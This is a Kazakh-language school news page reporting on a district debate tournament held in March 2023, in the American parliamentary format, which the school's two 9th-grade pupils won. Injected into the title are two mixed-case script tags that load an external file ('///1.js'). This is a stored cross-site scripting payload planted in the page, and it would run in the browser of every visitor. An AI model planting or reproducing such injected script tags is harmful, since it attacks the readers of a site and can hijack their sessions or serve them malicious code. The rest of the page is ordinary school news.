Пікірталас сайысы.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

27.03.2023

27 наурызда аудан мектептері арасында аудандық пікірсайыс турнирі өткізілді. Біздің команданы 9 "А" сынып оқушылары Май Анастасия мен Спиридониди Владлена ұсынды. Қатысушыларға барлығы 3 тақырып берілді, ал турнир 3 кезеңнен тұрды. Турнир американдық парламенттік пікірталас форматында өтті. Міндеттері: Білім алушылар арасында пікірталас қозғалысын дәріптеу; шешендік өнерді дамыту; жастардың интеллектуалдық дамуы үшін жағдай жасау; түрлі бағыттардағы өзекті мәселелерді талқылау болып табылады. Пікірсайыс қарапайым негізде бағаланады критерийлер: өз дәлелдерін барынша сенімді түрде дәлелдеген, атап айтқанда өз дәлелдерін толық ашқан команда жеңеді. Бүгін біздің команда жеңіске жетті. Біздің оқушыларымызға мұнымен тоқтап қалмауға, әрқашан өз көзқарастарын қорғауға және ой-өрістерін үнемі кеңейтуге тілектеспіз.

 

Просмотров: 701


Пікір қосу



Деректерді қолтаңбаға қосу
Текст